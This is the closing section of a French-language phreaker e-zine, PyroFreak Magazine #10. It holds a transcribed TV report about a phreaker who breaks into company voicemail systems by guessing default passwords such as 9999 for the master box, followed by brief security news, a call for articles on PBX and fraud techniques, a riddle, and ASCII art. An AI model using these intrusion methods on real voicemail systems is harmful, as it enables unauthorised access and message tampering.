          Aujourd'hui, 30 ans plus tard, la nouvelle gnration
          de phreakers procde de la mme faon, c'est--dire
           tatons.
            a fait que l, je vais essayer une compagnie de
          la rgion, OK!
            Par hasard? Comment tu l'as choisie cette
          entreprise-l?
            Je l'ai choisie par rapport que l'image est grosse
          dans le bottin.
           - Ah! Bon!
           - a se voit bien.
          La mthode de Neuro est toute simple. Il commence
          en se connectant  un systme, en se faisant passer
          pour un usager rgulier de la compagnie.
            Bonjour! Ici le serveur vocal interactif OCTEL.
          Il peut tout d'abord essayer des boites vocales avec
          diffrents mots de passe par dfaut, c'est--dire
          faciles  deviner.
            Veuillez composer votre mot de passe.
          Il affirme qu'il peut ainsi pntrer dans 30% des
          boites vocales appartenant  des individus. Sauf qu'il
          s'intresse plutt  ce qu'il appelle la boite matresse,
          celle qui contrle tout un systme donn et dont le
          numro est souvent 9999. Et parfois, Neuro tombe sur
          des boites matresses dont le mot de passe est aussi
          9999.
            a, c'est la boite vocale qui contrle toutes les
          autres. a fait que mme si le monde du systme
          protge leur boite vocale au maximum avec un mot de
          passe, par exemple de 10 caractres, de 10 chiffres...
            Oui?
            a ne donne absolument rien par rapport qu'avec
          celle-l, je peux toutes les reseter, les mettre  zro.
          Et il peut faire bien d'autres choses encore.
            Je pourrais changer la musique quand a sonne
          occup aussi, le message d'attente. Je pourrais
          changer l'heure du systme, changer plus de mots de
          passe.
          Selon Neuro, une entreprise sur dix protge mal son
          rseau de messagerie vocale au Qubec. Une
          valuation qui ne surprend pas Jacques Viau du
          module des crimes technologiques du Service de
          police de la CUM.
           On met beaucoup de technologie tout d'un coup et
          puis c'est pas toujours toutes les entreprises qui sont
          hyper- comptentes dans la technologie qu'ils
          dploient.
          Un laisser-aller que Neuro exploite  loisir auprs
          des PME de sa rgion.
            Aucun message.
            Ah! Et l leur mot de passe, c'tait quoi?
            Ah! Les 4 derniers chiffres du numro de
          tlphone.
          La tentation est grande alors de choisir un mot de
          passe qui est facile  retenir.
            J'ai un mot de passe pour entrer sur un systme,
          un autre mot de passe pour entrer sur un autre, j'ai
          deux mots de passe sur mon portable, j'ai un mot de
          passe pour ma boite vocale ici, un mot de passe pour
          ma boite vocale chez moi. J'ai trois comptes, trois
          accs Internet, j'ai trois mots de passe diffrents.
          Neuro insiste sur le fait qu'il ne fait rien de mal, mais
          il admet qu'il se laisse parfois emporter.
            Comme une compagnie, exemple, en
          informatique, qui vend du matriel de pitre qualit,
          j'ai chang le mme message dans les trois. Je veux
          dire que j'ai conseill au monde d'aller magasiner
          ailleurs.
          C'est ce qui fait que de pntrer sans autorisation
          dans une boite vocale est quand mme un crime
          rappelle Jacques Viau.
            Euh, si on compare a a une agression sexuelle
          ou un homicide, bien entendu, c'est un crime qui ne
          touche pas directement  l'intgrit d'une personne.
          Par contre, a pourrait avoir des consquences trs
          graves, le fait d'effacer un message.
          Pourtant, Neuro dit qu'au contraire, il rend service au
          public.
           - Si la personne se fait pirater son systme, on va
          essayer de changer pour du meilleur, toujours du
          meilleur.
          Parfois mme, Neuro laisse des messages  des
          entreprises pour les avertir qu'elles sont vulnrables,
          mais cette attitude de Robin des Bois technologique
          ne convainc pas les autorits.
            Moi, je ne pense pas que tu veuilles que je vole ton
          auto juste pour te montrer que ton auto est vulnrable,
          OK?
            Et toi, pourquoi tu fais a?
            J'aime a, j'aime savoir du nouveau. Je veux dire,
          j'ai toujours aim jouer avec la technologie, je veux
          dire, jouer avec la limite, l. Qu'est-ce que les gens
          pensent pas que tu pourrais faire. J'aime a, c'est
          comme une drogue.
          Bref, la meilleure protection reste peut-tre les
          bonnes vieilles technologies. 












            Pour la suite, Crdit Taz Magazine  (www.zataz.com)


Motorola a de grande oreille
Motorola vient de dposer un brevet dcrivant un mcanisme
de dtournement d'appels. Cette technique permettrait, selon
le magazine britannique The Scientist, de contourner la trop
grande scurit des liaisons point  point, utilises par les
essaims de satellites  orbite basse.


La CIA espionne nos entreprises
James Woolsey, ancien directeur de la CIA a admis, dans
les colonnes de Heise Online, que les services secrets
amricains pratiquent l'espionnage industriel, principalement
dans les pays Europens. Cet espionnage des entreprises
europennes se justifie par le fait qu'elles se servent
de pots de vin pour gagner les contrats internationaux.
James Woolsey prcise galement qu'il espre que le
gouvernement des Etats Unis continuera d'espionner les
entreprises qui se servent de pratiques de ngociations
dloyales.

Mon portable est un mouchard
Un amricain, Kvin Manley, a dcouvert qu'en faisant des
achats sur le web, via son tlphone portable, son numro
de tlphone tait communiqu aux sites web qui en faisaient
la demande. Il a dcouvert ce traage en achetant des bouquins
chez Amazon.com. Il est abonn chez Sprint. Rien n'empche de
penser que les autres fournisseurs d'abonnement tlphonique
ne font pas de mme.


Microsoft n'est pas une succursale de la NSA
Microsoft dment formellement les allgations selon lesquelles la socit
aurait des liens avec les services de renseignement amricains. Suite aux
rumeurs rcentes cites par des sources mdiatiques, Microsoft tient 
prciser qu'en aucun cas la socit n'a install, en France ou dans tout
autre pays, un systme permettant  une administration amricaine telle
que la " National Security Agency ", ou tout autre service dpendant du
gouvernement amricain, de dcoder les informations chiffres provenant
d'un ordinateur quip de Windows. Microsoft dment compltement cette
rumeur. Il n'existe pas de mcanisme de ce type dans Windows, ni mme
dans tout autre logiciel commercialis par Microsoft dans le monde.


La guerre est ouverte
Le service de la dfense nationale canadienne vient d'annoncer
la cration d'une section anti pirate pas comme les autres.
Une quipe de scientifiques et d'informaticiens ont t
regroups dans le centre de recherche de la dfense bas 
Ottawa. Leurs missions : concevoir de nouvelles mesures de
sauvegarde en imitant les pirates, en crant de nouveaux virus
afin de les tudier et  concevoir de nouvelles dfenses.
Le directeur gnral de ce nouveau service se nomme Prakash
Bhartia, il a expliqu que son quipe tait compose de 14 personnes.


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
: 
|28-Conclusion 
'.________Par Neuro_____________ _______ neuro@pyrofreak.org __ __



Un autre numro de fini. Donc, si vous avez des ides sur comment amiliorer
le magazine, faite le nous savoir a pyrofreakmag@hotmail.com , et ca va
nous faire plaisir de lire cela. Bref, notre but c'est toujours de 
s'amiliorer, donc on est ouvert pas mal a toute. Dsol encore une fois pour
le retard de 2 mois de ce numro. On va essayer d'etre plus ponctuel pour
le prochain numro, qui devrais sortir vers le dbut des vacances d't
(Dbut Juin, Mi-Juin).

                   Encore une fois, merci de nous avoir lu!

___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le    |
|pyrofreakmag@hotmail.com .(Les articles envoys les en .txt ou .rtf SVP!) |
|SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en   |
|page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-|
|tions ou commentaires, envoyez les aussi  pyrofreakmag@hotmail.com .     |
|__________________________________________________________________________|
Sujets D'articles proposs:
-Logs de scan 1-800 ou autres
-Explication de nouveaux type de Vmb ou Pbx
-Critiques de divers programmes se rapportant a l'underground
-Informations intressantes sur les cellulaires ou pagettes (Tatoo)
-Informations intressantes sur un type de fraudage
-Technique de hack particulires
-Anecdote particulire
-Programmation intressante pour L'underground
-Etc, utilisez votre imagination!

                               

Site Web: www.PyroFreak.org
IRC Chan: #PyroFreak


                       -------->NIGME<--------

           Pour conclure, voici une petite nigme de Einstein:
             "Merci  |[3M^N qui nous a communiqu l'nigme"

	Selon Einstein, "70%" des gens sont INCAPABLES de rsoudre le test
suivant. Il faut trouver qui leve les poissons. Il y a 5 maisons alignes
de couleurs diffrentes. Dans chaque maison vit une personne de nationalit
diffrente. Chaque personne fume un type de cigarette, boit une boisson et
leve un animal diffrents.

Il faut trouver qui leve les poissons.

1. L'Anglais vit dans la maison rouge.
2. Le Sudois leve des chiens.
3. Le Danois boit du th.
4. La maison verte est juste a cot de la maison blanche.
5. Le propritaire de la maison verte boit du caf.
6. L'homme qui vit dans la maison du centre boit du lait.
7. Le fumeur de Pall Mall leve des oiseaux.
8. Le Norvgien vit dans la premiere maison.
9. L'homme qui fume des Blend vit a cot de celui qui leve des chats.
10. La personne qui leve des chevaux vit a cot du fumeur de Dunhill.
11. L'homme qui fume des Blue Master boit de la biere.
12. L'Allemand fume des Prince.
13. Le Norvgien vit a cot de la maison bleue.
14. L'homme qui fume des Blend a un voisin qui boit de l'eau.
15. Le propritaire de la maison jaune fume des Dunhill.

NB: C'est normal que ca prenne une quarantaine de minutes si c'est pas plus
    pour trouver l'nigme.

    La rponse se retrouve  la fin de ce mag.



Pense: Moi c moi! 
        _____ _____     _     ______  ______ __ ___      _________
       |:      __ _ \  \  \  /     / |        ____ |    /   ___   |
       |      \__ _\ \  \  \/ ;   /  |;      /_ _/ |   /   /   /; |
       |   ____ __ ___\  \    :  /   |:  _        /   |   /   / : | 
       |: |              /    , /    |, | \     : \   |  :\__/    |
       |; |          ___/ .    /     |. |  \    ;  \  |  ;       /
       |___\         \________/      |___\  \__ ____\ |__________|
        ____ _ ___ __     ___   ___          ______   __    _______
       |:  _ _      ;\   |   \ \   \        /     ;| |  |  /   .  /
       |  |   \_______\  |:  _\ \_ _\      / /|   :| | ;| /      /
      _|  |___   _____   |; |__  ____     / <_|   ,| |  |/    : /
     |_|,  ___| |;   .\  |   __\ \_:__\  /   _     | |        ;/
       |: |     |:  ` /  | :|____  ____  \  / |;   | |  |\     \
       |; |     |, |\ \  | ;     \ \   ;\ \/  |:   | |: | \    \
       |___\    |__| \_| |________\ \____\    |____| |___\ \_____\
           
                                                         Crdit: __2





                                  '::-::`
                                   (o o)    	
                               ooO--(_)--Ooo-
        2000(c) tOUT lES dROITS sONT rSERVS  pYROfREAk mAGAZINE






              _________________________________________
             /  .        .         .    .        .     \
            |       .         .               .    .    |  
            |              .           .                |
            '-----,----,--.--,----,-----,----,----,-----'        
                  | |) |  |  | |) |  ___|  __| |) |
                  |    |  |  |   /|  .__.  __|   /
                  | |) |     | | \|  |  |    | | \
                  '----'-----'-'--'-----'----'-'--'
                  ,--, ,--,  ,--,  ,------,--, ,--,
                  |  |_|  | / __ \ |      |  |/  /
                  |       |/ /__\ \|   ___|     (
                  |  ,-,  |   __   |      |      \ 
                  |  | |  |  /  \  |      |  |\   |
            ,-----'--' '--'--    --'------'--' ---'-----,
            |                                           |
             \_________________________________________/   

            venez gouter a notre tout nouveau RHOOTER JR   
    
               (c) RHOOTER JR is a burger hack trademark

n.b Merci Wyzeman pour le Burger Hack :)


                   C'est l'Allemand qui lve les poissons 